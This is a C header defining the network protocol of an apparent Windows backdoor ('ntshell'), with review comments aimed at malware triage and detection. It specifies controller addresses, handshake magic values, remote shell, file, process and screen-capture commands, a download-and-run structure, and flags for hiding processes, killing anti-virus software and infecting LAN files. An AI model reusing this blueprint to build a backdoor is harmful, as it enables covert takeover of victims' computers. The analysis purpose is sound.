

#if !defined(ntshell_h) 
#define ntshell_h 
 
#if _MSC_VER > 1000 
#pragma once 
#endif // _MSC_VER > 1000 
 
#ifdef __cplusplus 
#pragma warning(disable : 4200) 
#endif 
 
// Version of this header: NTSHELL_VERSION packs the minor number into the
// low byte and the major number into bits 8 and up (major 0, minor 78 here).
// NOTE(review): presumably the value carried in the WORD ClientVersion /
// ServerVersion fields below and returned for QUERY_NTSHELLVERSION -- confirm.
#define NTSHELL_MINORVERSION 78 
#define NTSHELL_MAJORVERSION 0 
#define NTSHELL_VERSION (NTSHELL_MINORVERSION | (NTSHELL_MAJORVERSION << 8)) 
 
// Identifiers of configuration entries (consecutive integers 0-12).
// NOTE(review): CFG_BEGIN / CFG_END look like delimiters of a tagged
// configuration section (see CONFIG_SECTION_SIZE); the encoding itself is
// not defined in this header -- confirm against the code that reads it.
// NOTE(review): going by the names, the entries hold two controller
// addresses, a controller port, a listen port, a password, feature flags
// and a run method. When triaging a sample these are the values worth
// recovering, since they describe where it connects and how it starts.
#define CFG_BEGIN 0 
#define CFG_END 1 
#define CFG_MASTER_ADDR 2 
#define CFG_MASTER_ADDR2 3 
#define CFG_MASTER_PORT 4 
#define CFG_LISTEN_PORT 5 
#define CFG_WAIT_MODE 6 
#define CFG_NEED_PWD 7 
#define CFG_PASSWORD 8 
#define CFG_GLOBAL_FLAGS 9 
#define CFG_CONN_SPACE 10 
#define CFG_PORT_HIJACK 11 
#define CFG_RUN_METHOD 12 
 
// 32-bit selectors, one per work mode: console, command shell, file
// manager, socket proxy, screen capture and process manager.
// NOTE(review): the mode meanings are read off the identifiers; where the
// selector is exchanged (presumably at connection setup) is not shown here.
// NOTE(review): if these values are sent verbatim they are candidate
// network signatures -- confirm byte order and offset against real traffic.
#define WORK_CONSOLE 0x5c698ea0 
#define WORK_CMDSHELL 0x32279732 
#define WORK_FILEMANAGER 0x835d2b99 
#define WORK_SOCKPROXY 0xf2795541 
#define WORK_SCREENCAPTURE 0xdc46070e 
#define WORK_PROCESSMANAGER 0xcba01986 
 
// 32-bit control codes. REBOOT / UPDATE / UNINSTALL / EXIT / SHUTDOWN are
// consecutive (0x774055a1 - 0x774055a5); the other three are unrelated values.
// NOTE(review): CONTROL_NONE is 0x12345678, a filler pattern that also occurs
// in unrelated software, so it should not be used as a detection key alone.
// NOTE(review): CONTROL_DISCONNECT is defined further down as the small
// integer 2 and does not belong to this value space -- confirm how the two
// are told apart.
#define CONTROL_NEWCONNECT 0x5aba7788 
#define CONTROL_QUERYINFO 0x58437964 
#define CONTROL_NONE 0x12345678 
#define CONTROL_REBOOT 0x774055a1 
#define CONTROL_UPDATE 0x774055a2 
#define CONTROL_UNINSTALL 0x774055a3 
#define CONTROL_EXIT 0x774055a4 
#define CONTROL_SHUTDOWN 0x774055a5 
 
// Status values for password-protected connections; by their names,
// "password required" and "password rejected".
// NOTE(review): which side sends them, and at what point of the handshake,
// is not defined here. Related settings are CFG_NEED_PWD, CFG_PASSWORD and
// MAX_PASSWORD_LENGTH -- confirm how the password itself is transmitted.
#define CONNECT_NEED_PWD 0x86570422 
#define CONNECT_INVALID_PWD 0xffff0000 
 
// Command numbers 1-9.
// NOTE(review): values 1-4 carry the same names and numbers as
// CONSOLE_LISTPROCESS .. CONSOLE_EXECUTE_1 defined later in this header;
// whether both sets are in use or one is a leftover cannot be told from here.
#define CMD_LISTPROCESS 1 
#define CMD_KILLPROCESS 2 
#define CMD_DOWNLOADFILE 3 
#define CMD_EXECUTE 4 
#define CMD_NEWINSTANCE 5 
#define CMD_RUNCOMMAND 6 
#define CMD_SHELLSESSION 7 
#define CMD_SOCKPROXY 8 
#define CMD_EXITCONSOLE 9 
 
// The only STATE_* value defined in this header.
// NOTE(review): the state machine that uses it is not visible here.
#define STATE_READY 0 
 
// Handshake magic values for four connection variants (CONN1 .. CONN4).
// CONN1 and CONN2 define ASK / ANSWER / OK; CONN3 and CONN4 define only
// ANSWER / OK.
// NOTE(review): the names suggest that the "slave" (controlled host) asks,
// the "master" (controller) answers and the slave acknowledges; the actual
// sequence and framing are not defined in this header -- confirm.
// NOTE(review): CONN2_MASTER_ANSWER is 0x87654321, too generic to match on
// by itself; the remaining values are better candidates for traffic
// signatures once their position in the stream has been verified.
#define CONN1_SLAVE_ASK 0x5468e21a 
#define CONN1_MASTER_ANSWER 0x7714e029 
#define CONN1_SLAVE_OK 0xff3a6bd6 
#define CONN2_SLAVE_ASK 0x23516def 
#define CONN2_MASTER_ANSWER 0x87654321 
#define CONN2_SLAVE_OK 0xa3d51234 
#define CONN3_MASTER_ANSWER 0x8566cae0 
#define CONN3_SLAVE_OK 0x63374899 
#define CONN4_MASTER_ANSWER 0x87845678 
#define CONN4_SLAVE_OK 0x87654878 
 
// Feature flags. Every value is a distinct single bit (1 .. 1024), so the
// flags can be OR-ed into one mask.
// NOTE(review): presumably the content of the CFG_GLOBAL_FLAGS entry -- confirm.
// NOTE(review): the names describe process and service hiding, ring-0
// access and driver loading, termination of anti-virus software, and
// infection of local and LAN files. None of that is implemented in this
// header; for a responder, the mask recovered from a sample indicates which
// of those behaviours to look for on the affected host.
#define FLAG_ALLOW_HIDE_PROCESS 1 
#define FLAG_ALLOW_RING0 2 
#define FLAG_RUN_SERVICE_ALWAYS 4 
#define FLAG_AUTO_KILL_AVSOFT 8 
#define FLAG_AUTO_INFECT_FILE 16 
#define FLAG_AUTO_INFECT_LAN_FILE 32 
#define FLAG_RECORD_ERROR 64 
#define FLAG_ALLOW_LOAD_DRIVER 128 
#define FLAG_ALLOW_HIDE_SERVICE 256 
#define FLAG_RING0_OPEN_FILE 512 
#define FLAG_AUTO_BACKUP_FILE 1024 
 
// Command completion states.
#define COMMAND_PENDING 0 
#define COMMAND_FINISH 1 
// NOTE(review): a small integer, unlike the 32-bit CONTROL_* codes above;
// presumably returned alongside COMMAND_PENDING / COMMAND_FINISH -- confirm.
#define CONTROL_DISCONNECT 2 
// Size limits. None of the four is referenced by a structure in this header,
// so whether each length includes a terminating NUL has to be checked at
// every place it is used.
#define BUFFER_SIZE 4096 
#define MAX_ADDRESS_LENGTH 64 
#define MAX_PASSWORD_LENGTH 32 
#define CONFIG_SECTION_SIZE 256 
// NOTE(review): presumably the name under which the program registers a
// Windows service; if so, it is a host-side indicator to look for in the
// service list -- confirm against the installation code.
#define SERVICE_NAME "ntwscsvc" 
 
// Request header: four WORD fields followed by a variable-length body.
// The Windows types used throughout this header (WORD, DWORD, PVOID, ...)
// are not pulled in here; the including file must provide them first.
// The structure carries no length field, so a parser has to take the body
// length from the enclosing packet and must not read beyond it.
typedef struct _NTSHELL_REQUEST 
{ 
	// NOTE(review): presumably NTSHELL_VERSION of the sender -- confirm.
	WORD ClientVersion; 
	// NOTE(review): presumably one of the per-service request codes
	// (FILEMGR_*, PROCMGR_*, CONSOLE_*) -- confirm.
	WORD RequestClass; 
	WORD Reserved; 
	WORD Reserved2; 
	// Flexible array declared as PVOID, so its element size follows the
	// pointer width of the build. NOTE(review): looks like it is only used
	// as the untyped start of the body -- confirm.
	PVOID Request[]; 
} NTSHELL_REQUEST, *PNTSHELL_REQUEST; 
 
// Reply header: version, class and message code, an error code, a record
// count, then the variable-length result data.
// No byte length is carried; NumberOfResults comes from the peer and must be
// checked against the number of bytes actually received before iterating.
typedef struct _NTSHELL_RESULTSET 
{ 
	// NOTE(review): presumably NTSHELL_VERSION of the replying side -- confirm.
	WORD ServerVersion; 
	WORD ResultClass; 
	// NOTE(review): presumably one of the MSG_* codes at the end of this header.
	WORD MessageCode; 
	WORD Reserved; 
	// NOTE(review): presumably a Win32 error code -- confirm.
	DWORD ErrorCode; 
	DWORD NumberOfResults; 
	// Flexible array declared as PVOID; element size depends on pointer
	// width. NOTE(review): presumably the untyped start of the records.
	PVOID ResultSet[]; 
} NTSHELL_RESULTSET, *PNTSHELL_RESULTSET; 
 
////////////////////////////////////////////////////////////////////// 
// File manager interface 
////////////////////////////////////////////////////////////////////// 
 
// File-manager operation codes (1-12): drive and directory listing, icon
// retrieval, directory create/remove, file read/write/execute/delete/copy/move.
// NOTE(review): presumably carried in NTSHELL_REQUEST.RequestClass -- confirm.
// NOTE(review): how FILEMGR_SIMPLYREADFILE differs from FILEMGR_READFILE is
// not stated in this header.
#define FILEMGR_LISTDRIVE 1 
#define FILEMGR_LISTFILE 2 
#define FILEMGR_GETFILEICON 3 
#define FILEMGR_CREATEDIRECTORY 4 
#define FILEMGR_REMOVEDIRECTORY 5 
#define FILEMGR_READFILE 6 
#define FILEMGR_WRITEFILE 7 
#define FILEMGR_EXECUTEFILE 8 
#define FILEMGR_DELETEFILE 9 
#define FILEMGR_COPYFILE 10 
#define FILEMGR_MOVEFILE 11 
#define FILEMGR_SIMPLYREADFILE 12 
 
// One directory-listing entry: attributes, two timestamps, a 64-bit size
// split into high and low DWORDs, then the file name.
// NOTE(review): the fields mirror a subset of WIN32_FIND_DATA -- confirm.
typedef struct _FILEMGR_FILEINFO 
{ 
	DWORD FileAttributes; 
    FILETIME CreationTime; 
    FILETIME LastWriteTime; 
    DWORD FileSizeHigh; 
    DWORD FileSizeLow; 
	// Variable-length name with no length field. NOTE(review): presumably
	// NUL-terminated; a reader must stop at the end of the received data
	// even if no terminator is found.
	CHAR FileName[]; 
} FILEMGR_FILEINFO, *PFILEMGR_FILEINFO; 
 
// Fixed-size description of one drive: type, root path, volume label and
// serial number, file-system name, total and free byte counts.
// NOTE(review): field names match the outputs of GetDriveType,
// GetVolumeInformation and GetDiskFreeSpaceEx -- confirm in the implementation.
// The CHAR arrays are fixed-size (40 / 16 / 16); the type does not guarantee
// NUL termination, so treat them as bounded buffers when reading.
typedef struct _FILEMGR_DRIVEINFO 
{ 
	DWORD DriveType; 
	CHAR RootPathName[40]; 
	CHAR VolumeName[16]; 
	DWORD VolumeSerialNumber; 
	CHAR FileSystemName[16]; 
	ULARGE_INTEGER TotalNumberOfBytes; 
	ULARGE_INTEGER TotalNumberOfFreeBytes; 
} FILEMGR_DRIVEINFO, *PFILEMGR_DRIVEINFO; 
 
// Icon bitmap: width, height and bit count followed by the pixel data.
// The length of Bits is not stored. NOTE(review): presumably derived from
// Width, Height and BitCount; a consumer must check that product for
// overflow and against the bytes received before copying or rendering.
typedef struct _FILEMGR_FILEICON 
{ 
	WORD Width; 
	WORD Height; 
	WORD BitCount; 
	BYTE Bits[]; 
} FILEMGR_FILEICON, *PFILEMGR_FILEICON; 
 
// File content record: fixed-size name, size, two timestamps, then the data.
// Same layout as FILEMGR_FILEWRITE.
// NOTE(review): presumably the reply to FILEMGR_READFILE -- confirm.
typedef struct _FILEMGR_FILEREAD 
{ 
	// Fixed MAX_PATH buffer; NUL termination is not guaranteed by the type.
	CHAR FileName[MAX_PATH]; 
	// 32-bit size, so a single record cannot describe 4 GiB or more
	// (FILEMGR_FILEINFO uses a high/low pair instead).
    DWORD FileSize; 
    FILETIME CreationTime; 
    FILETIME LastWriteTime; 
	// NOTE(review): presumably FileSize bytes long; verify against the
	// amount of data actually received before use.
	BYTE FileData[]; 
} FILEMGR_FILEREAD, *PFILEMGR_FILEREAD; 
 
// File content record for writing: fixed-size name, size, two timestamps,
// then the data. Same layout as FILEMGR_FILEREAD.
// NOTE(review): presumably the body of a FILEMGR_WRITEFILE request; the
// timestamp fields would let the sender choose the times set on the written
// file, which matters when file times are used as forensic evidence -- confirm.
typedef struct _FILEMGR_FILEWRITE 
{ 
	// Peer-supplied path in a fixed MAX_PATH buffer; NUL termination is not
	// guaranteed by the type.
	CHAR FileName[MAX_PATH]; 
	// 32-bit size; NOTE(review): presumably the length of FileData, to be
	// checked against the bytes received.
    DWORD FileSize; 
    FILETIME CreationTime; 
    FILETIME LastWriteTime; 
	BYTE FileData[]; 
} FILEMGR_FILEWRITE, *PFILEMGR_FILEWRITE; 
 
// A single variable-length name, reachable as either FileName or PathName
// (both union members start at offset 0).
// The structure consists only of zero-length arrays inside an anonymous
// union, which relies on compiler extensions (this header disables MSVC
// warning 4200 for C++ builds); sizeof gives no usable length, so the
// string length must come from the enclosing packet.
// NOTE(review): presumably used by the single-path operations
// (list, create/remove directory, execute, delete) -- confirm.
typedef struct _FILEMGR_FILENAME 
{ 
	union 
	{ 
		CHAR FileName[]; 
		CHAR PathName[]; 
	}; 
} FILEMGR_FILENAME, *PFILEMGR_FILENAME; 
 
// Two fixed-size MAX_PATH names.
// NOTE(review): presumably source and destination for FILEMGR_COPYFILE and
// FILEMGR_MOVEFILE; which field is which is not stated -- confirm.
// NUL termination is not guaranteed by the type.
typedef struct _FILEMGR_FILENAME2 
{ 
	CHAR FileName1[MAX_PATH]; 
	CHAR FileName2[MAX_PATH]; 
} FILEMGR_FILENAME2, *PFILEMGR_FILENAME2; 
 
////////////////////////////////////////////////////////////////////// 
// Process manager interface 
////////////////////////////////////////////////////////////////////// 
 
// Process-manager operation codes (1-4).
// NOTE(review): how PROCMGR_FORCEKILLPROCESS differs from
// PROCMGR_KILLPROCESS is not defined in this header -- confirm in the handler.
#define PROCMGR_LISTPROCESS 1 
#define PROCMGR_KILLPROCESS 2 
#define PROCMGR_RUN 3 
#define PROCMGR_FORCEKILLPROCESS 4 
 
// One process record: times, priority, ids and memory counters, followed by
// four 16-bit offsets that locate the next record and three strings.
// NOTE(review): the offsets are presumably relative to the start of this
// record and OffsetOfNextEntry is presumably 0 in the last record -- confirm.
// Every offset comes from the peer: a parser must check each one against the
// received length, and must reject a next-entry offset that does not move
// forward, before dereferencing.
typedef struct _PROCMGR_PROCESSINFO 
{ 
	LARGE_INTEGER ProcessCreateTime; 
	LARGE_INTEGER ProcessCpuTime; 
	ULONG BasePriority; 
	ULONG ProcessId; 
	ULONG ParentProcessId; 
	// 32-bit counters: sizes of 4 GiB or more cannot be represented.
	ULONG TotalVirtualSizeBytes; 
	ULONG TotalPrivateBytes; 
	USHORT OffsetOfNextEntry; 
	USHORT OffsetOfProcessName; 
	USHORT OffsetOfUserName; 
	USHORT OffsetOfImagePath; 
} PROCMGR_PROCESSINFO, *PPROCMGR_PROCESSINFO; 
 
// Identifies a process by id.
// NOTE(review): presumably the body of PROCMGR_KILLPROCESS and
// PROCMGR_FORCEKILLPROCESS requests -- confirm.
typedef struct _PROCMGR_PROCESSKILL 
{ 
	ULONG ProcessId; 
} PROCMGR_PROCESSKILL, *PPROCMGR_PROCESSKILL; 
 
// Program start request: a show-window value, a reserved WORD and a
// variable-length image path.
// NOTE(review): presumably the body of PROCMGR_RUN -- confirm.
typedef struct _PROCMGR_PROCESSRUN 
{ 
	// NOTE(review): presumably a Win32 SW_* value; a hidden-window value
	// would start the program without a visible window -- confirm.
	WORD ShowWindow; 
	WORD Reserved; 
	// No length field; the string length must come from the enclosing packet.
	CHAR ImagePath[]; 
} PROCMGR_PROCESSRUN, *PPROCMGR_PROCESSRUN; 
 
////////////////////////////////////////////////////////////////////// 
// Console interface 
////////////////////////////////////////////////////////////////////// 
 
// Console operation codes (1-6).
// NOTE(review): the difference between CONSOLE_EXECUTE_1 and
// CONSOLE_EXECUTE_2 is not stated here; both presumably use CONSOLE_EXECUTE.
#define CONSOLE_LISTPROCESS 1 
#define CONSOLE_KILLPROCESS 2 
#define CONSOLE_DOWNLOADFILE 3 
#define CONSOLE_EXECUTE_1 4 
#define CONSOLE_EXECUTE_2 5 
#define CONSOLE_SENDMESSAGE 6 
 
// Identifies a process by id; same layout as PROCMGR_PROCESSKILL.
// NOTE(review): presumably the body of a CONSOLE_KILLPROCESS request.
typedef struct _CONSOLE_PROCESSKILL 
{ 
	ULONG ProcessId; 
} CONSOLE_PROCESSKILL, *PCONSOLE_PROCESSKILL; 
 
// Download request: a URL, a local save path and a run flag, all fixed-size.
// NOTE(review): by the field names the receiving host fetches Url, stores it
// at SavePath and runs it when RunIt is non-zero. For responders that is a
// download-and-execute capability, so outbound fetches and newly written
// executables are the artefacts to look for -- confirm in the handler.
typedef struct _CONSOLE_FILEDOWNLOAD 
{ 
	// Both buffers are MAX_PATH long, which also caps the URL length;
	// NUL termination is not guaranteed by the type.
	CHAR Url[MAX_PATH]; 
	CHAR SavePath[MAX_PATH]; 
	BOOL RunIt; 
} CONSOLE_FILEDOWNLOAD, *PCONSOLE_FILEDOWNLOAD; 
 
// Command execution request: a result flag, a timeout and a variable-length
// command line.
typedef struct _CONSOLE_EXECUTE 
{ 
	// NOTE(review): presumably selects whether command output is returned.
	BOOL ShowResult; 
	// Unit is not stated in this header. NOTE(review): confirm (ms vs s).
	DWORD TimeOut; 
	// No length field; the string length must come from the enclosing packet.
	CHAR CommandLine[]; 
} CONSOLE_EXECUTE, *PCONSOLE_EXECUTE; 
 
// Message request: a display method followed by variable-length text.
// NOTE(review): presumably the body of CONSOLE_SENDMESSAGE; the values of
// DisplayMethod are not defined in this header.
typedef struct _CONSOLE_MESSAGESEND 
{ 
	ULONG DisplayMethod; 
	// No length field; the string length must come from the enclosing packet.
	CHAR MessageText[]; 
} CONSOLE_MESSAGESEND, *PCONSOLE_MESSAGESEND; 
 
////////////////////////////////////////////////////////////////////// 
// Screen monitoring interface 
////////////////////////////////////////////////////////////////////// 
 
// Screen transfer methods.
// NOTE(review): presumably the values of SCREENCAP_SCREENBITMAP.Method:
// a full frame, a difference against the previous frame, or an XOR with it.
// The exact encodings are not defined in this header -- confirm.
#define SCREEN_FULL 1 
#define SCREEN_DIFFERENCE 2 
#define SCREEN_XOR 3 
 
// Screen capture frame: dimensions, colour depth, transfer method and a
// size, followed by the bitmap data.
typedef struct _SCREENCAP_SCREENBITMAP 
{ 
	WORD Width; 
	WORD Height; 
	WORD Depth; 
	// NOTE(review): presumably one of SCREEN_FULL / SCREEN_DIFFERENCE /
	// SCREEN_XOR -- confirm.
	WORD Method; 
	// NOTE(review): presumably the byte length of Bits. It comes from the
	// peer, so a decoder must check it against the bytes received and
	// against Width, Height and Depth before allocating or copying.
	DWORD Size; 
	BYTE Bits[]; 
} SCREENCAP_SCREENBITMAP, *PSCREENCAP_SCREENBITMAP; 
 
////////////////////////////////////////////////////////////////////// 
// Port proxy service interface 
////////////////////////////////////////////////////////////////////// 
 
// Result codes of the proxy service: success, address too long, port could
// not be opened.
// NOTE(review): the proxy request format itself is not defined in this
// header; PROXYERR_ADDRTOOLONG presumably relates to MAX_ADDRESS_LENGTH.
#define PROXYERR_SUCCESS 0 
#define PROXYERR_ADDRTOOLONG 1 
#define PROXYERR_OPENPORTFAILED 2 
 
////////////////////////////////////////////////////////////////////// 
// I/O packet format 
////////////////////////////////////////////////////////////////////// 
 
// Packet framing, simple form: one DWORD holding a 2-bit type and a 30-bit
// size, followed by the payload.
// Bit-field placement inside the DWORD is chosen by the compiler, so an
// independent decoder must be validated against real traffic rather than
// derived from this declaration alone.
typedef struct _PACK_TYPE_1 
{ 
	// 2 bits: values 0-3. NOTE(review): presumably distinguishes
	// PACK_TYPE_1 from PACK_TYPE_2 -- the values are not defined here.
	DWORD dwPackType : 2; 
	// 30 bits: up to 0x3FFFFFFF (about 1 GiB). Whether it counts the header
	// is not stated. The value is peer-controlled, so a receiver must cap it
	// well below that maximum before allocating or reading.
	DWORD nPackSize : 30; 
	BYTE bPackData[]; 
} PACK_TYPE_1, *PPACK_TYPE_1; 
 
// Packet framing, extended form: the type/size DWORD of PACK_TYPE_1, a
// CRC-32, two one-bit flags sharing a word with a 30-bit original size, then
// the payload.
// Bit-field placement is chosen by the compiler; verify any independent
// decoder against real traffic.
typedef struct _PACK_TYPE_2 
{ 
	DWORD dwPackType : 2; 
	// 30 bits: up to 0x3FFFFFFF; peer-controlled, cap before allocating.
	DWORD nPackSize : 30; 
	// NOTE(review): which bytes the CRC covers (payload before or after
	// compression/encryption) is not stated -- confirm. A CRC detects
	// corruption only; it gives no protection against deliberate tampering.
	DWORD dwCrc32; 
	// BOOL is a signed int in the Windows SDK, so a 1-bit field may read
	// back as 0 or -1; test these flags for non-zero, never "== TRUE".
	BOOL bCompressed : 1; 
	// NOTE(review): the cipher and key handling are not defined in this header.
	BOOL bEncrypted : 1; 
	// NOTE(review): presumably the payload size before compression. It is
	// peer-controlled, so a decompressor must bound it before allocating
	// and must stop if the output would exceed it.
	DWORD nOriginalSize : 30; 
	BYTE bPackData[]; 
} PACK_TYPE_2, *PPACK_TYPE_2; 
 
////////////////////////////////////////////////////////////////////// 
// System information query interface 
////////////////////////////////////////////////////////////////////// 
 
// Information classes for system queries (0-8): processor name and speed,
// physical memory size, OS version, computer name, current user name,
// system root and the program's own version.
// NOTE(review): QUERY_ENDQUERY (0) presumably terminates a list of
// requested classes -- confirm.
#define QUERY_ENDQUERY 0 
#define QUERY_PROCESSORNAME 1 
#define QUERY_PROCESSORMHZ 2 
#define QUERY_PHYSMEMORYSIZE 3 
#define QUERY_SYSTEMVERSION 4 
#define QUERY_COMPUTERNAME 5 
#define QUERY_CURRENTUSERNAME 6 
#define QUERY_SYSTEMROOT 7 
#define QUERY_NTSHELLVERSION 8 
 
// One query item: the information class being asked for.
// NOTE(review): presumably one of the QUERY_* values above -- confirm.
typedef struct _QUERY_INFORMATION 
{ 
	WORD InformationClass; 
} QUERY_INFORMATION, *PQUERY_INFORMATION; 
 
// One query answer: information class, length, then the data.
typedef struct _QUERY_RESULTSET 
{ 
	// NOTE(review): presumably echoes the requested QUERY_* class.
	WORD InformationClass; 
	// 16-bit length, so at most 65535. NOTE(review): presumably the byte
	// length of Information; check it against the bytes received before use.
	WORD InformationLength; 
	// Encoding (string vs integer) per class is not defined in this header.
	BYTE Information[]; 
} QUERY_RESULTSET, *PQUERY_RESULTSET; 
 
////////////////////////////////////////////////////////////////////// 
// Server-side message codes 
////////////////////////////////////////////////////////////////////// 
 
// Message codes reported by the server side.
// NOTE(review): presumably the values of NTSHELL_RESULTSET.MessageCode;
// MSG_RING0_DISABLED presumably relates to FLAG_ALLOW_RING0 -- confirm.
#define MSG_NONE 0 
#define MSG_RING0_DISABLED 1 
 
#endif